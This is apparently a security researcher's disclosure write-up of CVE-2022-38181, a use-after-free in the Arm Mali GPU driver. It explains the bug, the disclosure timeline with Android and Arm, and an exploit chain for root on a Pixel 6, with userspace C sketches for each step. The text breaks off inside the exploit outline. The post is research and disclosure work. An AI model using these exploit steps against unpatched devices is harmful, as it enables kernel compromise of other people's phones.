Pwning the all Google phone with a non-Google bug

2023-01-23 10:03:17

The “not-Google” bug in the “all-Google” phone

The year is 2021 A.D. The first “all Google” phone, the Pixel 6 series, made entirely by Google, is launched.

Well not entirely…

One small GPU chip still holds out. And life is not easy for security researchers who audit the fortified camps of Midgard, Bifrost, and Valhall.

An unlucky security researcher was about to learn this the hard way as he wandered into the Arm Mali regime:

Screenshot of an email from the Android security team saying that the reported bug has been labeled "Won't fix."

CVE-2022-38181

In this post I’ll cover the details of CVE-2022-38181, a vulnerability in the Arm Mali GPU that I reported to the Android security team on 2022-07-12, together with a proof-of-concept exploit that uses this vulnerability to gain arbitrary kernel code execution and root privileges on a Pixel 6 from an Android app. The bug was assigned bug ID 238770628. After initially rating it as a High-severity vulnerability, the Android security team later decided to reclassify it as "Won't fix" and passed my report to Arm's security team. I was eventually able to get in touch with Arm's security team to follow up on the issue independently. The Arm security team was very helpful throughout and released a public patch in version r40p0 of the driver on 2022-10-07 to address the issue, which was considerably quicker than similar disclosures that I have had in the past on Android. A coordinated disclosure date of around mid-November was also agreed to allow time for users to apply the patch. However, I was unable to connect with the Android security team, and the bug was quietly fixed in the January update on Pixel devices as bug 259695958. Neither the CVE ID nor the bug IDs (the original 238770628 and the new 259695958) were mentioned in the security bulletin. Our advisory, together with the disclosure timeline, can be found here.

The Arm Mali GPU

The Arm Mali GPU is a GPU that can be integrated into a wide variety of devices, ranging from Android phones to smart TV boxes. For example, all of the international versions of the Samsung S series phones up to the S21 use the Mali GPU, as does the Pixel 6 series. For additional examples, see "Implementations" in the Mali (GPU) Wikipedia entry for some specific devices that use the Mali GPU.

As explained in my other post, GPU drivers on Android are a very attractive target for an attacker, as they can be reached directly from the untrusted app domain, and most Android devices use either Qualcomm's Adreno GPU or the Arm Mali GPU, meaning that relatively few bugs can cover a large number of devices.

In fact, of the seven Android 0-days that were detected as exploited in the wild in 2021, five targeted GPU drivers. Another more recent bug that was exploited in the wild, CVE-2021-39793, disclosed in March 2022, also targeted a GPU driver. Together, of these six bugs that were exploited in the wild and targeted Android GPU drivers, three targeted the Qualcomm GPU, while the other three targeted the Arm Mali GPU.

Due to the complexity involved in managing memory sharing between user space applications and the GPU, many of the vulnerabilities in the Arm Mali GPU involve the memory management code. The current vulnerability is another example of this, and involves a special type of GPU memory: JIT memory.

Contrary to the name, JIT memory doesn't seem to be related to JIT-compiled code, as it is created as non-executable memory. Instead, it appears to be used for memory caches, managed by the GPU kernel driver, that can readily be shared with user applications and returned to the kernel when memory pressure arises.

Many other types of GPU memory are created directly using ioctl calls like KBASE_IOCTL_MEM_IMPORT. (See, for example, the section "Memory management in the Mali kernel driver" in my earlier post.) This, however, is not the case for JIT memory regions, which are created by submitting a special GPU instruction using the KBASE_IOCTL_JOB_SUBMIT ioctl call.

The KBASE_IOCTL_JOB_SUBMIT ioctl can be used to submit a "job chain" to the GPU for processing. Each job chain is basically a list of jobs, which are opaque data structures that contain job headers, followed by payloads that contain the actual instructions. For an example, see the Writing to GPU memory section in my earlier post. While KBASE_IOCTL_JOB_SUBMIT is usually used for sending instructions to the GPU itself, there are also some jobs that are carried out in the kernel and run on the host (CPU) instead. These are the software jobs ("softjobs"), and among them are jobs that instruct the kernel to allocate and free JIT memory (BASE_JD_REQ_SOFT_JIT_ALLOC and BASE_JD_REQ_SOFT_JIT_FREE).
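
To make the softjob interface more concrete, here is a rough userspace sketch of submitting a BASE_JD_REQ_SOFT_JIT_ALLOC atom. It assumes the Mali UAPI headers matching the device's driver version are available, and the atom field usage shown follows one driver release, so treat it as illustrative rather than exact:

#include <string.h>
#include <sys/ioctl.h>
#include <linux/types.h>
/* Assumed: Mali UAPI headers matching the target driver version; header names and
 * struct layouts vary slightly between driver releases. */
#include "mali_kbase_ioctl.h"
#include "mali_base_kernel.h"

/* Sketch: submit one softjob atom asking the kernel to allocate JIT memory.
 * `fd` is an opened and initialized /dev/mali0 file descriptor (the JIT allocator
 * must already have been set up with KBASE_IOCTL_MEM_JIT_INIT), and `jit_info`
 * points to a user-space base_jit_alloc_info describing the requested allocation. */
static int submit_jit_alloc(int fd, struct base_jit_alloc_info *jit_info)
{
    struct base_jd_atom_v2 atom;
    memset(&atom, 0, sizeof(atom));

    atom.jc = (__u64)(unsigned long)jit_info;    /* softjob payload: the JIT alloc info */
    atom.nr_extres = 1;                          /* one JIT allocation described */
    atom.atom_number = 0;
    atom.core_req = BASE_JD_REQ_SOFT_JIT_ALLOC;  /* run in the kernel, not on the GPU */

    struct kbase_ioctl_job_submit submit = {
        .addr = (__u64)(unsigned long)&atom,
        .nr_atoms = 1,
        .stride = sizeof(atom),
    };
    return ioctl(fd, KBASE_IOCTL_JOB_SUBMIT, &submit);
}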

The life cycle of JIT reminiscence

While KBASE_IOCTL_JOB_SUBMIT is a general purpose ioctl call and contains code paths that are responsible for handling different types of GPU jobs, the BASE_JD_REQ_SOFT_JIT_ALLOC job essentially calls kbase_jit_allocate_process, which then calls kbase_jit_allocate to create a JIT memory region. To understand the lifetime and usage of JIT memory, let me first introduce a few different concepts.

When using the Mali GPU driver, a user app first needs to create and initialize a kbase_context kernel object. This involves the user app opening the driver file and using the resulting file descriptor to make a series of ioctl calls. A kbase_context object is responsible for managing resources for each opened driver file and is unique to each file handle. In particular, it has three list_head fields that are responsible for managing JIT memory: jit_active_head, jit_pool_head, and jit_destroy_head. As their names suggest, jit_active_head contains memory that is still in use by the user application, jit_pool_head contains memory regions that are not in use, and jit_destroy_head contains memory regions that are pending to be freed and returned to the kernel. Although both jit_pool_head and jit_destroy_head are used to manage JIT regions that are free, jit_pool_head acts like a memory pool and contains JIT regions that are intended to be reused when new JIT regions are allocated, while jit_destroy_head contains regions that are going to be returned to the kernel.
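
The fields involved can be summarized with a simplified excerpt of the kernel structure. This is an abbreviated sketch of the relevant members only (the jit_alloc array and evict_list are discussed below), not the full definition, which varies between driver versions:

/* Simplified sketch of the kbase_context members involved in JIT memory
 * management (abbreviated; the real structure has many more fields). */
struct kbase_context {
    /* ... */
    struct list_head jit_active_head;       /* JIT regions currently in use by userland */
    struct list_head jit_pool_head;         /* free JIT regions cached for reuse */
    struct list_head jit_destroy_head;      /* free JIT regions about to be returned to the kernel */
    struct kbase_va_region *jit_alloc[256]; /* regions allocated via BASE_JD_REQ_SOFT_JIT_ALLOC,
                                             * indexed by the user-supplied JIT ID */
    struct list_head evict_list;            /* evictable allocations, reclaimable under memory pressure */
    /* ... */
};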

When kbase_jit_allocate is called, it will first try to find a suitable region in jit_pool_head:

    if (info->usage_id != 0)
        /* First scan for an allocation with the same usage ID */
        reg = find_reasonable_region(info, &kctx->jit_pool_head, false);
        ...
    if (reg) {
        ...
        list_move(&reg->jit_node, &kctx->jit_active_head);

If a suitable region is found, it will be moved to jit_active_head, indicating that it is now in use in userland. Otherwise, a new memory region will be created and added to jit_active_head instead. The region allocated by kbase_jit_allocate, whether newly created or reused from jit_pool_head, is then stored in the jit_alloc array of the kbase_context by kbase_jit_allocate_process.

When the user no longer needs the JIT memory, it can send a BASE_JD_REQ_SOFT_JIT_FREE job to the GPU. This then uses kbase_jit_free to free the memory. However, rather than returning the backing pages of the memory region to the kernel immediately, kbase_jit_free first shrinks the backing region to a minimal size and removes any CPU-side mapping, so that the pages in the region are no longer reachable from the address space of the user process:

void kbase_jit_free(struct kbase_context *kctx, struct kbase_va_region *reg)
{
    ...
    //First reduce the size of the backing region and unmap the freed pages
    old_pages = kbase_reg_current_backed_size(reg);
    if (reg->initial_commit < old_pages) {
        u64 new_size = MAX(reg->initial_commit,
            div_u64(old_pages * (100 - kctx->trim_level), 100));
        u64 delta = old_pages - new_size;
        //Free delta pages in the region and reduce its size to old_pages - delta
        if (delta) {
            mutex_lock(&kctx->reg_lock);
            kbase_mem_shrink(kctx, reg, old_pages - delta);
            mutex_unlock(&kctx->reg_lock);
        }
    }
    ...
    //Remove the pages from the address space of the user process
    kbase_mem_shrink_cpu_mapping(kctx, reg, 0, reg->gpu_alloc->nents);    

Note that the backing pages of the region (reg) are not completely removed at this stage, and reg is also not going to be freed here. Instead, reg is moved back into jit_pool_head. However, perhaps more interestingly, reg is also added to the evict_list of the kbase_context:

    kbase_mem_shrink_cpu_mapping(kctx, reg, 0, reg->gpu_alloc->nents);
    ...
    mutex_lock(&kctx->jit_evict_lock);
    /* This allocation can't already be on a list. */
    WARN_ON(!list_empty(&reg->gpu_alloc->evict_node));
    //Add reg to evict_list
    list_add(&reg->gpu_alloc->evict_node, &kctx->evict_list);
    atomic_add(reg->gpu_alloc->nents, &kctx->evict_nents);
    //Move reg to jit_pool_head
    list_move(&reg->jit_node, &kctx->jit_pool_head);

After kbase_jit_free completes, its caller, kbase_jit_free_finish, will also clear the reference that was stored in jit_alloc when the region was allocated, even though reg is still valid at this stage:

static void kbase_jit_free_finish(struct kbase_jd_atom *katom)
{
    ...
    for (j = 0; j != katom->nr_extres; ++j) {
        if ((ids[j] != 0) && (kctx->jit_alloc[ids[j]] != NULL)) {
            ...
            if (kctx->jit_alloc[ids[j]] !=
                    KBASE_RESERVED_REG_JIT_ALLOC) {
                ...
                kbase_jit_free(kctx, kctx->jit_alloc[ids[j]]);
            }
            kctx->jit_alloc[ids[j]] = NULL;    //<--------- clean up reference
        }
    }
    ...
}

As we've seen before, the memory region in the jit_pool_head list may now be reused when the user allocates another JIT region. So this explains jit_pool_head and jit_active_head. What about jit_destroy_head? When JIT memory is freed by calling kbase_jit_free, it is also placed on the evict_list. Memory regions in the evict_list are regions that can be freed when memory pressure arises. By placing a JIT region that is no longer in use on the evict_list, the Mali driver can hold onto unused JIT memory for fast reallocation, while returning it to the kernel when the resources are needed.

The Linux kernel provides a mechanism to reclaim unused cached memory, called shrinkers. Kernel components, such as drivers, can define a shrinker object, which, among other things, involves defining the count_objects and scan_objects methods:

struct shrinker {
    unsigned long (*count_objects)(struct shrinker *,
                       struct shrink_control *sc);
    unsigned long (*scan_objects)(struct shrinker *,
                      struct shrink_control *sc);
    ...
};

The custom shrinker can then be registered via the register_shrinker method. When the kernel is under memory pressure, it will go through the list of registered shrinkers and use their count_objects method to determine the potential amount of memory that can be freed, and then use scan_objects to free the memory. In the case of the Mali GPU driver, the shrinker is defined and registered in the kbase_mem_evictable_init method:

int kbase_mem_evictable_init(struct kbase_context *kctx)
{
    ...
    //kctx->reclaim is a shrinker
    kctx->reclaim.count_objects = kbase_mem_evictable_reclaim_count_objects;
    kctx->reclaim.scan_objects = kbase_mem_evictable_reclaim_scan_objects;
    ...
    register_shrinker(&kctx->reclaim);
    return 0;
}

The more interesting of these methods is kbase_mem_evictable_reclaim_scan_objects, which is responsible for freeing the memory needed by the kernel.

static
unsigned long kbase_mem_evictable_reclaim_scan_objects(struct shrinker *s,
        struct shrink_control *sc)
{
    ...
    list_for_each_entry_safe(alloc, tmp, &kctx->evict_list, evict_node) {
        int err;

        err = kbase_mem_shrink_gpu_mapping(kctx, alloc->reg,
                0, alloc->nents);
        ...
        kbase_free_phy_pages_helper(alloc, alloc->evicted);
        ...
        list_del_init(&alloc->evict_node);
        ...
        kbase_jit_backing_lost(alloc->reg);   //<------- moves `reg` to `jit_destroy_head`
    }
    ...
}

This is called to remove cached memory in jit_pool_head and return it to the kernel. The function kbase_mem_evictable_reclaim_scan_objects goes through the evict_list, unmaps the backing pages from the GPU (recall that the CPU mapping was already removed in kbase_jit_free) and then frees the backing pages. It then calls kbase_jit_backing_lost to move reg from jit_pool_head to jit_destroy_head:

void kbase_jit_backing_lost(struct kbase_va_region *reg)
{
    ...
    list_move(&reg->jit_node, &kctx->jit_destroy_head);

    schedule_work(&kctx->jit_work);
}

The memory region in jit_destroy_head is then picked up by kbase_jit_destroy_worker, which frees the kbase_va_region in jit_destroy_head and removes references to the kbase_va_region entirely.

Well, not entirely… one small pointer still holds out against the cleanup logic. And lifetime management is not easy for the pointers in the fortified camps of the Arm Mali regime.

The cleanup logic in kbase_mem_evictable_reclaim_scan_objects is not responsible for removing the reference in jit_alloc from when the JIT memory was allocated, but this is not normally a problem, because, as we've seen before, that reference was cleared when kbase_jit_free_finish was called to put the region on the evict_list, and, normally, a JIT region is only moved to the evict_list when the user frees it via a BASE_JD_REQ_SOFT_JIT_FREE job, which removes the reference stored in jit_alloc.

But we don't do normal things here, nor do the people who seek to compromise devices.

The vulnerability

While the semantics of memory eviction are closely tied to JIT memory, with most of the eviction functionality referencing "JIT" (for example, the use of kbase_jit_backing_lost in kbase_mem_evictable_reclaim_scan_objects), evictable memory is more general, and other types of GPU memory can also be added to the evict_list and made evictable. This can be achieved by calling kbase_mem_evictable_make to add memory regions to the evict_list and kbase_mem_evictable_unmake to remove memory regions from it. From userspace, these can be reached via the KBASE_IOCTL_MEM_FLAGS_CHANGE ioctl. Depending on whether the BASE_MEM_DONT_NEED flag is passed (which corresponds to the kernel-side KBASE_REG_DONT_NEED flag), a memory region can be added to or removed from the evict_list; a userspace sketch of this call follows the kernel excerpt below:

int kbase_mem_flags_change(struct kbase_context *kctx, u64 gpu_addr, unsigned int flags, unsigned int mask)
{
    ...
    prev_needed = (KBASE_REG_DONT_NEED & reg->flags) == KBASE_REG_DONT_NEED;
    new_needed = (BASE_MEM_DONT_NEED & flags) == BASE_MEM_DONT_NEED;
    if (prev_needed != new_needed) {
        ...
        if (new_needed) {
            ...
            ret = kbase_mem_evictable_make(reg->gpu_alloc);  //<------ Add to `evict_list`
            if (ret)
                goto out_unlock;
        } else {
            kbase_mem_evictable_unmake(reg->gpu_alloc);     //<------- Remove from `evict_list`
        }
    }
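
From userspace, marking a region as evictable is just a flags-change ioctl on the region's GPU address. A minimal sketch, assuming the Mali UAPI headers for the target driver version are available (the struct layout shown follows one driver release and may differ on others):

#include <sys/ioctl.h>
#include <linux/types.h>
#include "mali_kbase_ioctl.h"   /* assumed: UAPI header matching the target driver */

/* Sketch: mark the region at gpu_va as evictable so that it is added to the
 * evict_list. Passing a zero flags value with the same mask would remove it again. */
static int make_evictable(int mali_fd, __u64 gpu_va)
{
    struct kbase_ioctl_mem_flags_change change = {
        .gpu_va = gpu_va,
        .flags  = BASE_MEM_DONT_NEED,   /* request eviction candidacy */
        .mask   = BASE_MEM_DONT_NEED,   /* only change this bit */
    };
    return ioctl(mali_fd, KBASE_IOCTL_MEM_FLAGS_CHANGE, &change);
}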

By putting a JIT memory region directly on the evict_list and then creating memory pressure to trigger kbase_mem_evictable_reclaim_scan_objects, the JIT region will be freed while a pointer to it is still stored in jit_alloc. After that, a BASE_JD_REQ_SOFT_JIT_FREE job can be submitted to trigger kbase_jit_free_finish, which uses the freed object pointed to by jit_alloc:

static void kbase_jit_free_finish(struct kbase_jd_atom *katom)
{
    ...
    for (j = 0; j != katom->nr_extres; ++j) {
        if ((ids[j] != 0) && (kctx->jit_alloc[ids[j]] != NULL)) {
            ...
            if (kctx->jit_alloc[ids[j]] !=
                    KBASE_RESERVED_REG_JIT_ALLOC) {
                ...
                kbase_jit_free(kctx, kctx->jit_alloc[ids[j]]);  //<----- Use of the now freed jit_alloc[ids[j]]
            }
            kctx->jit_alloc[ids[j]] = NULL;
        }
    }

Among other things, kbase_jit_free will first free some of the backing pages of the now freed kctx->jit_alloc[ids[j]]:

void kbase_jit_free(struct kbase_context *kctx, struct kbase_va_region *reg)
{
    ...
    old_pages = kbase_reg_current_backed_size(reg);
    if (reg->initial_commit < old_pages) {
        ...
        u64 delta = old_pages - new_size;
        if (delta) {
            mutex_lock(&kctx->reg_lock);
            kbase_mem_shrink(kctx, reg, old_pages - delta);  //<----- Free some pages in the region
            mutex_unlock(&kctx->reg_lock);
        }
    }

So by replacing the freed JIT region with a fake object, I can potentially free arbitrary pages, which is a very powerful primitive.

Exploiting the bug

As explained before, this bug is triggered when the kernel is under memory pressure and calls kbase_mem_evictable_reclaim_scan_objects via the shrinker mechanism. From a user process, the required memory pressure can be created as simply as mapping a large amount of memory using the mmap system call. However, the exact amount of memory required to trigger the shrinker scanning is uncertain, meaning that there is no guarantee that a shrinker scan will be triggered after such an allocation. While I can try to allocate an excessive amount of memory to ensure that the shrinker scanning is triggered, doing so risks causing an out-of-memory crash and may also cause the object replacement to be unreliable. This causes problems in triggering and exploiting the bug reliably.

It would be good if I could allocate memory incrementally and check whether the JIT region is freed by kbase_mem_evictable_reclaim_scan_objects after each allocation step and only proceed with the exploit when I’m sure that the bug has been triggered.

The Mali driver provides an ioctl, KBASE_IOCTL_MEM_QUERY, for querying properties of memory regions at a specific GPU address. If the address is invalid, the ioctl fails and returns an error. This allows me to check whether the JIT region has been freed, because when kbase_mem_evictable_reclaim_scan_objects is called to free the JIT region, it first removes its GPU mappings, making its GPU address invalid. By using the KBASE_IOCTL_MEM_QUERY ioctl to query the GPU address of the JIT region after each allocation, I can therefore check whether the region has been freed by kbase_mem_evictable_reclaim_scan_objects, and only start spraying the heap to replace the JIT region once it has actually been freed. Moreover, the KBASE_IOCTL_MEM_QUERY ioctl doesn't involve memory allocation, so it won't interfere with the object replacement. This makes it ideal for testing whether the bug has been triggered.
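
A minimal sketch of such a probe, again assuming the Mali UAPI headers for the target driver version (the union layout and query constant shown follow one driver release):

#include <sys/ioctl.h>
#include <linux/types.h>
#include "mali_kbase_ioctl.h"   /* assumed: UAPI header matching the target driver */

/* Sketch: returns non-zero once the GPU address no longer resolves to a region,
 * i.e. once the JIT region has been torn down by the shrinker scan. */
static int jit_region_freed(int mali_fd, __u64 jit_gpu_va)
{
    union kbase_ioctl_mem_query query = {
        .in = {
            .gpu_addr = jit_gpu_va,
            .query    = KBASE_MEM_QUERY_COMMIT_SIZE,  /* any property query will do */
        },
    };
    /* The ioctl fails with an error once the GPU mapping has been removed. */
    return ioctl(mali_fd, KBASE_IOCTL_MEM_QUERY, &query) < 0;
}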

Although the shrinker is a kernel mechanism for freeing up evictable memory, the scanning and removal of evictable objects via shrinkers is actually carried out by the process that is requesting the memory. So, for example, if my process is mapping some memory into its address space (via mmap and then faulting the pages in), and the amount of memory that I'm mapping creates sufficient memory pressure that a shrinker scan is triggered, then the shrinker scan and the removal of the evictable objects will be done in the context of my process. This, in particular, means that if I pin my process to a CPU while the shrinker scan is triggered, the JIT region that is removed during the scan will be freed on the same CPU. (Strictly speaking, this isn't one hundred percent correct, because the JIT region is actually scheduled to be freed on a worker, but most of the time the worker is indeed executed immediately on the same CPU.)

This helps me replace the freed JIT region reliably, because when objects are freed in the kernel, they are placed in a per-CPU cache, and subsequent object allocations on the same CPU are served from that CPU cache first. This means that, by allocating another object of a similar size on the same CPU, I'm likely to be able to replace the freed JIT region. Moreover, the JIT region, which is a kbase_va_region, is a rather large object that is allocated from the kmalloc-256 cache (which serves kmalloc allocations of up to 256 bytes that don't fit in the smaller caches) rather than the kmalloc-128 cache (which serves allocations of up to 128 bytes), and kmalloc-256 is a less heavily used cache. This, together with the relative certainty of which CPU frees the JIT region, allows me to reliably replace the JIT region after it is freed.
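
The pinning and memory-pressure side of this is plain Linux API usage. A minimal sketch, reusing the hypothetical jit_region_freed probe from above as the stop condition:

#define _GNU_SOURCE
#include <sched.h>
#include <string.h>
#include <sys/mman.h>
#include <linux/types.h>

/* Sketch: pin the current thread to one CPU so that the shrinker scan (and hence the
 * freeing of the JIT region) happens on a predictable CPU, then apply memory pressure
 * in small increments until the probe reports that the region has been torn down. */
static void pin_to_cpu(int cpu)
{
    cpu_set_t set;
    CPU_ZERO(&set);
    CPU_SET(cpu, &set);
    sched_setaffinity(0, sizeof(set), &set);
}

static void apply_pressure_until_freed(int mali_fd, __u64 jit_gpu_va)
{
    const size_t chunk = 16ul << 20;   /* 16 MiB per step; tune for the device */
    while (!jit_region_freed(mali_fd, jit_gpu_va)) {
        void *p = mmap(NULL, chunk, PROT_READ | PROT_WRITE,
                       MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
        if (p == MAP_FAILED)
            break;
        memset(p, 0x41, chunk);        /* fault the pages in so memory is really consumed */
    }
}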

Replacing the freed object

Now that I can reliably replace the freed JIT region, I can look at how to exploit the bug. As explained before, the freed JIT memory can be used as the reg argument in the kbase_jit_free function to potentially be used for freeing arbitrary pages:

void kbase_jit_free(struct kbase_context *kctx, struct kbase_va_region *reg)
{
    ...
    old_pages = kbase_reg_current_backed_size(reg);
    if (reg->initial_commit < old_pages) {
        ...
        u64 delta = old_pages - new_size;
        if (delta) {
            mutex_lock(&kctx->reg_lock);
            kbase_mem_shrink(kctx, reg, old_pages - delta);  //<----- Free some pages in the region
            mutex_unlock(&kctx->reg_lock);
        }
    }

One possibility is to use the well-known heap spraying technique to replace the freed JIT region with arbitrary data using sendmsg. This would allow me to create a fake kbase_va_region with a fake gpu_alloc and fake pages that could be used to free arbitrary pages in kbase_mem_shrink:

int kbase_mem_shrink(struct kbase_context *const kctx,
        struct kbase_va_region *const reg, u64 new_pages)
{
    ...
    err = kbase_mem_shrink_gpu_mapping(kctx, reg,
            new_pages, old_pages);
    if (err >= 0) {
        /* Replace all CPU mapping(s) */
        kbase_mem_shrink_cpu_mapping(kctx, reg,
                new_pages, old_pages);
        kbase_free_phy_pages_helper(reg->cpu_alloc, delta);   //<------- free pages in cpu_alloc
        if (reg->cpu_alloc != reg->gpu_alloc)
            kbase_free_phy_pages_helper(reg->gpu_alloc, delta);   //<--- free pages in gpu_alloc

In order to do so, I would need to know the addresses of some data that I control, so that I could place a fake gpu_alloc and its pages field at those addresses. This could be done either by finding a way to leak addresses of kernel objects, or by using techniques like the one I wrote about in the section "The Ultimate fake object store" in my other post.

But why use a fake object when you can use a real one?

The JIT region involved in the use-after-free bug here is a kbase_va_region, which is a complex object with a number of states. Many operations can only be carried out on memory objects in the correct state. In particular, kbase_mem_shrink can only be used on a kbase_va_region that has not been mapped multiple times.

The Mali driver provides the KBASE_IOCTL_MEM_ALIAS ioctl, which allows multiple memory regions to share the same backing pages. I've written about how KBASE_IOCTL_MEM_ALIAS works in more detail in my previous post, but for the purpose of this exploit, the important point is that KBASE_IOCTL_MEM_ALIAS can be used to create memory regions in the GPU and user address spaces that are aliased to a kbase_va_region, meaning that they are backed by the same physical pages. If a kbase_va_region reg is mapped multiple times by using KBASE_IOCTL_MEM_ALIAS and then has its backing pages freed by kbase_mem_shrink, then only the memory mappings in reg are removed, so the alias regions created by KBASE_IOCTL_MEM_ALIAS can still be used to access the freed backing pages.

To prevent kbase_mem_shrink from being called on aliased JIT memory, kbase_mem_alias checks for the KBASE_REG_NO_USER_FREE flag, so that JIT memory cannot be aliased:

u64 kbase_mem_alias(struct kbase_context *kctx, u64 *flags, u64 stride,
            u64 nents, struct base_mem_aliasing_info *ai,
            u64 *num_pages)
{
    ...
    for (i = 0; i < nents; i++) {
        if (ai[i].handle.basep.handle < BASE_MEM_FIRST_FREE_ADDRESS) {
            if (ai[i].handle.basep.handle !=
                BASEP_MEM_WRITE_ALLOC_PAGES_HANDLE)
            ...
        } else {
            ...
            if (aliasing_reg->flags & KBASE_REG_NO_USER_FREE)  //<-- 2.
                goto bad_handle; /* JIT regions can't be
                          * aliased. NO_USER_FREE flag
                          * covers the entire lifetime
                          * of JIT regions. The other
                          * types of regions covered
                          * by this flag also shall
                          * not be aliased.
            ...
        }

Now suppose I trigger the bug and replace the freed JIT region with a normal memory region allocated via the KBASE_IOCTL_MEM_ALLOC ioctl, which is an object of the exact same type, but without the KBASE_REG_NO_USER_FREE flag that is associated with a JIT region. I then use KBASE_IOCTL_MEM_ALIAS to create an extra mapping for the backing store of this new region. All of this is valid, as I'm just aliasing a normal memory region that doesn't have the KBASE_REG_NO_USER_FREE flag. However, because of the bug, a dangling pointer in jit_alloc also points to this new region, which has now been aliased.

If I now submit a BASE_JD_REQ_SOFT_JIT_FREE job to call kbase_jit_free on this memory, then kbase_mem_shrink will be called, and part of the backing store of this new region will be freed, but the extra mappings created in the aliased region will not be removed, meaning that I can still access the freed backing pages from the alias region. By using a real object of the same type, not only do I save the effort needed to craft a fake object, but it also reduces the risk of side effects that could lead to a crash.
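
A rough sketch of this replace-and-alias step, once more assuming the Mali UAPI headers for the target driver version (the ioctl unions follow one driver release; the flag choices and region set-up details are illustrative, and the published exploit handles the exact mapping requirements):

#include <sys/ioctl.h>
#include <linux/types.h>
#include "mali_kbase_ioctl.h"   /* assumed: UAPI header matching the target driver */

/* Sketch: allocate a normal GPU memory region (to reoccupy the freed kbase_va_region's
 * slab slot) and then alias its backing pages, so that they remain reachable from the
 * alias after kbase_jit_free later shrinks the region via the dangling jit_alloc pointer. */
static int alloc_and_alias(int mali_fd, __u64 pages, __u64 *alloc_gpu_va, __u64 *alias_gpu_va)
{
    union kbase_ioctl_mem_alloc alloc = { 0 };
    alloc.in.va_pages = pages;
    alloc.in.commit_pages = pages;
    alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_CPU_WR |
                     BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_GPU_WR;   /* illustrative flags */
    if (ioctl(mali_fd, KBASE_IOCTL_MEM_ALLOC, &alloc) < 0)
        return -1;
    *alloc_gpu_va = alloc.out.gpu_va;

    struct base_mem_aliasing_info ai = { 0 };
    ai.handle.basep.handle = *alloc_gpu_va;   /* the region whose pages we want to alias */
    ai.length = pages;                        /* alias the whole backing store */

    union kbase_ioctl_mem_alias alias = { 0 };
    alias.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD;
    alias.in.stride = pages;
    alias.in.nents = 1;
    alias.in.aliasing_info = (__u64)(unsigned long)&ai;
    if (ioctl(mali_fd, KBASE_IOCTL_MEM_ALIAS, &alias) < 0)
        return -1;

    *alias_gpu_va = alias.out.gpu_va;   /* this mapping survives the later shrink */
    return 0;
}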


The situation is now very similar to what I had in my previous post, and the exploit flow from this point on is also very similar. For completeness, I'll give an overview of how the exploit works here, but interested readers can check out more details from the section "Breaking out of the context" onwards in that post.

To recap, I now have access to the backing pages of a kbase_va_region object that has already been freed, and I'd like to reuse these freed backing pages so that I can gain read and write access to arbitrary memory. To understand how this can be done, we need to know how the backing pages of a kbase_va_region are allocated.

When allocating pages for the backing store of a kbase_va_region, the kbase_mem_pool_alloc_pages function is used:

int kbase_mem_pool_alloc_pages(struct kbase_mem_pool *pool, size_t nr_4k_pages,
        struct tagged_addr *pages, bool partial_allowed)
{
    ...
    /* Get pages from this pool */
    while (nr_from_pool--) {
        p = kbase_mem_pool_remove_locked(pool);     //<------- 1.
        ...
    }
    ...
    if (i != nr_4k_pages && pool->next_pool) {
        /* Allocate via next pool */
        err = kbase_mem_pool_alloc_pages(pool->next_pool,      //<----- 2.
                nr_4k_pages - i, pages + i, partial_allowed);
        ...
    } else {
        /* Get any remaining pages from kernel */
        while (i != nr_4k_pages) {
            p = kbase_mem_alloc_page(pool);     //<------- 3.
            ...
        }
        ...
    }
    ...
}

The input argument kbase_mem_pool is a memory pool managed by the kbase_context object associated with the driver file that is used to allocate the GPU memory. As the comments suggest, the allocation is actually done in tiers. First the pages are allocated from the current kbase_mem_pool using kbase_mem_pool_remove_locked (1 in the above). If there is not enough capacity in the current kbase_mem_pool to meet the request, then pool->next_pool is used to allocate the pages (2 in the above). If even pool->next_pool doesn't have the capacity, then kbase_mem_alloc_page is used to allocate pages directly from the kernel via the buddy allocator (the page allocator in the kernel).

When freeing a page, the opposite happens: kbase_mem_pool_free_pages first tries to return the pages to the kbase_mem_pool of the current kbase_context; if that memory pool is full, it tries to return the remaining pages to pool->next_pool. If the next pool is also full, then the remaining pages are returned to the kernel by freeing them via the buddy allocator.

As noted in my previous post, pool->next_pool is a memory pool managed by the Mali driver and shared by all the kbase_context objects. It is also used for allocating page table global directories (PGDs) used by GPU contexts. In particular, this means that, by carefully arranging the memory pools, it is possible to cause a freed backing page of a kbase_va_region to be reused as a PGD of a GPU context. (The details of how to achieve this can be found in my previous post.) As the bottom-level PGD stores the physical addresses of the backing pages of GPU virtual memory addresses, being able to write to a PGD allows me to map arbitrary physical pages into GPU memory, which I can then read from and write to by issuing GPU commands. This gives me access to arbitrary physical memory. As the physical addresses of kernel code and static data are not randomized and depend only on the kernel image, I can use this primitive to overwrite arbitrary kernel code and gain arbitrary kernel code execution.

In the following figure, the green block indicates the same page being reused as the PGD.

To summarize, the exploit involves the following steps (a code-level outline is sketched after the list):

  1. Create JIT memory.
  2. Mark the JIT memory as evictable.
  3. Increase memory pressure by mapping memory into user space via normal mmap system calls.
  4. Use the KBASE_IOCTL_MEM_QUERY ioctl to check whether the JIT memory has been freed. Keep applying memory pressure until the JIT region is freed.
  5. Allocate new GPU memory regions using the KBASE_IOCTL_MEM_ALLOC ioctl to replace the freed JIT memory.
  6. Create an alias region to the new GPU memory region that replaced the JIT memory, so that the backing pages of the new GPU memory are shared with the alias region.
  7. Submit a BASE_JD_REQ_SOFT_JIT_FREE job to free the JIT region. As the JIT region has now been replaced by the new memory region, this causes kbase_jit_free to remove the backing pages of the new memory region, but the GPU mappings created in the alias region in step 6 are not removed. The alias region can now be used to access the freed backing pages.
  8. Reuse the freed backing pages as a PGD of the kbase_context. The alias region can now be used to rewrite the PGD. I can then map arbitrary physical pages into the GPU address space.
  9. Map kernel code into the GPU address space to gain arbitrary kernel code execution, which can then be used to rewrite the credentials of our process to gain root, and to disable SELinux.
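
As a code-level outline only, here is how those steps might line up in an exploit's main routine. Every helper named here is hypothetical shorthand for one of the numbered steps (or one of the sketches earlier in this post), not a function from the driver or from the published exploit:

/* Hypothetical outline of the exploit flow; each helper is shorthand for one of the
 * numbered steps above and is not a real driver or exploit function. */
int exploit_outline(int mali_fd)
{
    __u64 jit_gpu_va, alloc_gpu_va, alias_gpu_va;
    __u64 nr_pages = 3;                                      /* size of the replacement region; arbitrary here */

    jit_gpu_va = create_jit_region(mali_fd);                 /* step 1: BASE_JD_REQ_SOFT_JIT_ALLOC softjob */
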